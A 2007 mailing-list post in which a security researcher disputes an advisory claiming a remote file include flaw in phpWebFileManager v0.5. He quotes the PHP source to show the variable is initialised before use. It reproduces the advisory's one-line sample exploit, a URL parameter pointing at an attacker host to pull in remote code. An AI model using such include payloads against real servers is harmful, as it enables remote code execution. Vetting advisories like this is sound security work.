[VIM] WTF: phpWebFileManager v0.5 (PN_PathPrefix) Remote File Include Vulnerability
George A. Theall
theall at tenablesecurity.com
Tue Jul 31 02:22:55 UTC 2007
Yet another advisory from ilker Kandemir:
http://archives.neohapsis.com/archives/bugtraq/2007-07/0366.html
Sample exploit:
index.php?PN_PathPrefix=http://attacker.txt?
Actual code from index.php from phpWebFileManager v0.5:
---- snip, snip, snip ----
$fm_init_file = dirname(__FILE__)
. (strlen(dirname(__FILE__)) > 0 ? '/' : '')
. 'init.inc.php';
if (! @file_exists($fm_init_file)) {
exit;
}
require_once $fm_init_file;
/*
* Libraries function inclusion
*/
require_once $PN_PathPrefix . 'functions.inc.php';
---- snip, snip, snip ----
So index.php first determine's the location of its init.inc.php file and
then requires it.
Actual code from init.inc.php from phpWebFileManager v0.5:
---- snip, snip, snip ----
$ModName = null;
$PN_PathPrefix = '';
if (defined('LOADED_AS_MODULE')) {
$ModName = basename(dirname(__FILE__));
$PN_PathPrefix = "modules/$ModName/";
} else {
$PN_PathPrefix = dirname(__FILE__);
$PN_PathPrefix .= '/';
}
---- snip, snip, snip ----
init.inc.php includes several other files, but I didn't see any that
might allow an attacker to override $PN_PathPrefix via some sort of
register_globals emulation.
George
--
theall at tenablesecurity.com
More information about the VIM
mailing list